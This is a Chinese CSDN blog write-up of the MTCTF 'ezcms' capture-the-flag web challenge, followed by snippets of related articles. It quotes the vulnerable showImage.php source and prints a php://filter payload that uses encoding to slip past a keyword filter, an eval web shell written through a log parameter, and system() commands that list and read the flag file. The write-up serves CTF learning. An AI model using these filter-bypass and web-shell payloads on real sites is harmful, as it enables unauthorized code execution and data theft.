MTCTF复现[ezcms]

最新推荐文章于 2024-08-22 08:49:30 发布
最新推荐文章于 2024-08-22 08:49:30 发布
阅读量911 收藏
点赞数 3
分类专栏: # CTF复现 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51652864/article/details/117368504
版权
本文详细介绍了如何复现一个MTCTF挑战,涉及环境配置、文件读取漏洞、编码绕过及文件包含漏洞的利用。通过解析源码,构造payload,最终获取敏感信息。过程中发现了非预期解,即通过文件包含漏洞而非反序列化来执行代码。
摘要由CSDN通过智能技术生成

MTCTF复现[ezcms]
环境配置:

docker pull y4tacker/ez_yxcms:1.0

进入界面,目录扫描一下,得到:
在这里插入图片描述访问robots.txt:

在这里插入图片描述
在这儿找到密码,md5解密即可:attack

在这里插入图片描述
用户attack,密码attack登陆就可以了

看到头像处的url为

class/showImage.php?file=logo.jpg

应该可以进行文件读取,所以去掉logo.jpg,然后bp抓包,得到源码:

<?php


error_reporting(0);
if ($_GET['file']){
    $filename = $_GET['file'];
    if ($filename=='logo.jpg'){
        header("Content-Type:image/png");
        echo file_get_contents("../static/images/logo.jpg");
    }else{
        ini_set('open_basedir','./');
        if ($filename=='hint.php'){
            echo 'nononono!';
        } else{
            if(preg_match('/read|[\x00-\x24\x26-\x2c]| |base|rot|strip|encode|flag|tags|iconv|utf|input|convertstring|lib|crypt|\.\.|\.\//i', $filename)){
                echo "hacker";
            }else{
                include($filename);
            }
        }
    }
}else{
    highlight_file(__FILE__);
}

源码过滤了很多东西,但是可以用编码来进行绕过:
并且虽然过滤了read,但是可以不要read,因为这二者是等价的
payload:

php://filter/conv%25%36%35rt.bas%25%36%3564-encod%25%36%35/resource=hint.php

得到hint.php的内容:

<?php
//以下是class目录结构
/*
- class
    -- cache
    -- templates
        --- api
            - Api.php
        ---admin
            -add_category.php
            -category_list.php
            -edit_category.php
            -admin.php
            -footer.php
            -header.php
            -left.php
        - login.php
        - index.php
        - api.php
    -- auth.php
    -- file_class.php
    -- hint.php
    -- Medoo.php
    -- render_file.php
    -- showImage.php
    -- info.php
*/

依次读取各个源码,在auth.php里发现:
在这里插入图片描述
实例化了info,跟进info,发现:

在这里插入图片描述

大概就是会把参数t的内容写到log函数里,并且文件名是/class/cache,可以通过文件包含漏洞来执行该文件
构造payload:

t=<?php @eval($_POST['yy']);?>

在这里插入图片描述
可以看到已经successful了
接下来访问构造payload:

yy=system(‘ls /’);

在这里插入图片描述
发现flagg,接着

yy=system(‘ls -al /’)

来读一下权限
在这里插入图片描述
最后构造yy=system(‘cat /flagg’);
但由于里面的内容是空的,所以读不出来

这是这道题的非预期解,预期解是正常的反序列化,详细的话可以看其他师傅的wp

o3Ev
关注
专栏目录
第四届2021美团网络安全 MT-CTF writeup
ShenZ的博客
12-12 5922
第四届2021美团网络安全 MT-CTF 文章目录第四届2021美团网络安全 MT-CTFMISCUn(ix)zip오징어 게임 鱿鱼游戏BoomCryptoSymbol MISC Un(ix)zip flag{Welc0me_Unz1p_Wonder4} 오징어 게임 鱿鱼游戏 7-zip可以看到加密算法ZipCrypto Store 再加上备注里提示flagornot.txt,采用明文爆破 明文爆破参考:https://blog.csdn.net/q851579181q/articl
[MTCTF]从出题人视角看ez_cms
Y4tacker的博客
05-23 1477
文章目录写在前面DockerhubWp 写在前面 太惨了,太傻了我,迷迷糊糊写了两天CMS,又累又自闭,还搞错了东西,给各位大师傅们道歉了,下面大师傅们要是瞧得上的化就那啥可以复现复现 Dockerhub docker pull y4tacker/ez_yxcms:1.0 随便写个docker-compose.yml version: "2" services: web: build: . image: yyds restart: always ports:
EZ CMS
oubasangdadada的博客
03-02 500
扫了后得到www.zip,下载源码 源码审计 上传文件提示u r not admin,审计源码找到判断管理员的逻辑。 upload.php中,上传文件: 审计Admin这个类。 Admin通过判断$this->checker是否为true来判断是否为admin,跟进一下Profile中的is_admin()函数, 需要$_COOKIE['user']===md5($secr...
[ByteCTF 2019]EZCMS 详解(hash长度扩展攻击+phar反序列化)
qq_45699846的博客
03-22 2116
[ByteCTF 2019]EZCMS 详解(hash长度扩展攻击+phar反序列化)
绿城杯2021 ezcms
weixin_45805993的博客
11-10 436
环境为eyoucms1.5.3 给了hint说是xxe,先搜索一下找到利用点 /Application/Home/Controller/Index 可以看到官方从1.5.4开始增加了过滤,而我们的版本是没有过滤的,故可以找方法利用 找到头像上传的后台 可以看到不对.ico文件进行验证, 上传路径构造规则,构造+爆破是可以访问到的 所以我们可以构造phar文件并将后缀改为,ico上传 利用xxe读取phar文件内容反序列化 利用Thinkphp5.0.24的链子 <?php namespace thin
ezcms-login:此存储库仅用于更新ezCMS。 对于新安装,请使用主ezCMS存储库
05-17
ezCMS UPDATE REPO自述文件 此存储库用于更新ezCMS。 它具有仅更新所需的login或admin文件夹的副本。 这个仓库是做什么用的? 快速总结 ezCMS 5.0版更新 克隆并提取此存储库以更新ezCM。 如何设置? 请参阅如何...
随易(CMSEZ)网站管理系统 v1.07 To v2.0.0 升级包
03-26
从v1.07到v2.0.0的升级包是针对该系统的重大版本更新,旨在引入新功能、优化性能以及修复已知问题,确保用户能获得更稳定、更高效的网站管理体验。 在此次升级中,我们可以期待以下几个关键的知识点: ...
IES云端学习平台:智慧服务与个性化诊断
Event活动管理模组则支持各类教学活动的组织和管理,而ezCMS多媒体管理模组则方便教师管理和分享个人影音资源。 翻转课堂是IES平台的一大特色,通过结合ezStation智慧型录製系統,教师可以录制并管理课程视频,鼓励...
同方ezONE平台走实用化SOA路线
03-04
平台上的关键组件包括ezPortal企业门户、ezFramework企业框架、ezCMS内容管理系统、ezWorkflow工作流系统、ezStudio开发工具、ezBI商业智能构件、ezESB企业服务总线以及ezGIS统一GIS构件等。这些构件旨在简化二次...
GKCTF2021-官方WriteUp.pdf
07-06
1. ezcms后台弱口令登录: 在Web应用中,后台管理界面通常需要账号和密码才能登录。如果后台账号密码设置过于简单(弱口令),就可能被攻击者轻易地利用。在这个案例中,攻击者通过访问“admin.php”成功进入了后台...
MTCTF_Crypto
shikaku_的博客
05-25 741
MTCTFeasy_RSARandom后记 一共有四道,做出了前两道,bob师傅ak了,记录一下 easy_RSA 第一步给了这些信息: n:0x9371c61a2b760109781f229d43c6f05b58de65aa2a674ff92334cb5219132448d72c1293c145eb6f35e58791669f2d8d3b6ce506f4b3543beb947cf119f463a00bd33a33c4d566c4fd3f4c73c697fa5f3bf65976284b9cc96ec8172
php反序列化漏洞小结 + bytectf-EzCMS-wp
weixin_42444939的博客
09-13 1037
php反序列化漏洞利用姿势 源码中存在unserialize函数(最常见场景) 审计步骤 寻找如下可能被利用的敏感函数: call_user_func array_map array_filter array_walk [ … ] 以上php的回调函数如果传入的参数可控,那么就能成功getshell 菜刀/蚁剑/冰蝎后续就不用说了emmm ps: eval等敏感函数当然也能被利用,但这种情况一...
MTCTF2021-GrandTravel
anwen12的博客
12-24 929
GrandTravel 0x01 知识点 nosql注入+ssrf+node反序列化+node拆分攻击+ftp提权 0x02 解题 1 sql注入拿到密码 首先拿到源码不难看出登录位置有注入嫌疑(感谢葫芦卜师傅的payload) 参考 https://blog.szfszf.top/article/9/ burp0_data = {"username": f"admin\"&&this[\"pass\"+\"word\"][{pos}]>\"{chr(mid)}\"&&am
参赛手册 | MT- CTF决赛参赛手册,零基础入门到精通,收藏这一篇就够了
最新发布
Python_0011的博客
08-22 735
录屏软件不做强制要求,录屏文件要能够清晰查看解题思路,严禁后期处理,录屏如果出现中断的情况,请在恢复后继续录屏操作,请及时通过本届“2022美团CTF赛场决赛群”(706569606)呼叫工作人员进行报备,听从工作人员的指示,及时重启录屏。当天比赛结束后,所有参赛队伍都需要在9月17日23:59:59前按照平台要求的格式,上传提交每道赛题详细的解题报告(WriteUp),经组委会审核后,确定各参赛队最终得分和排名。违者予以终止比赛资格处罚,并保留追加通报所在单位、列入比赛黑名单等处罚的权利;
CTF——Web——PHP序列化和反序列化
小锤队长的博客
08-09 5829
PHP 序列化和反序列化: 1,序列化(串行化):是将变量转换为可保存或传输的字符串的过程; 反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。 常见的php系列化和反系列化方式主要有:serialize,unserialize;json_encode,json_decode 在进行类的序列化...
纵横杯CTF部分WEB题解
ChenZIDu的博客
12-27 846
easyci 一道SQL注入题,大概思路:sql注入写入shell,读取flag文件。 sqlmap先读取"/etc/apache2/apache2.conf"内容。 sqlmap -u http://eci-2ze0xe7juyhmgubdhea1.cloudeci1.ichunqiu.com/public/index.php/home/login --data "username=admin&password=1" -p username --technique B --dbms mysql -
美团MTCTF 2022 smtp pwn解
z1r0的博客
09-20 1938
会将mail from的信息存在入from中,如果send to的长度大于0xff,会将sendto的数据赋值给s,需要注意的是这个数据我们可控,没有进行大小限制,而s是有大小限制的,所以直接strcpy会造成栈溢出漏洞,成功发现漏洞。接下来就是如何把flag给带出来,因为直接cat的话是没有回显的,笔者原本想着用wget下载一个木马,然后连上去(哈哈),但是感觉太麻烦了,所以问了些师傅有什么东西可以将cat的东西直接输出到屏幕上,>&1,可以把文件的东西给带出来。
CTF--CMS漏洞总结
热门推荐
woshisz0413的博客
11-27 1万+
CMS漏洞总结 CMS类型题目: 首先判断CMS类型,再查询该CMS曾经出现的漏洞,利用漏洞获取用户名(admin)、密码后进入管理员界面查找注入; 或者上传一句话木马后使用菜刀连接,可能再连接数据库。 (1)CMSEASY类型 可用公开漏洞网站:https://www.seebug.org/appdir/CmsEasy 1.cmseasy 无限制报错注入 步骤:向http://*****/cel...
暑期web练习11:php大法(实验吧)
qq_41618162的博客
08-18 486
解题连接:http://ctf5.shiyanbar.com/DUTCTF/index.php 这里拿到题目后,开始的界面没有给出任何东西,但是我们看到下面的index.php.txt,自然的就想打开它试试 打开后得到了一段源码: &amp;lt;?php if(eregi(&quot;hackerDJ&quot;,$_GET[id])) { echo(&quot;&amp;lt;p&amp;gt;not allowed!&amp;l
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

o3Ev

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值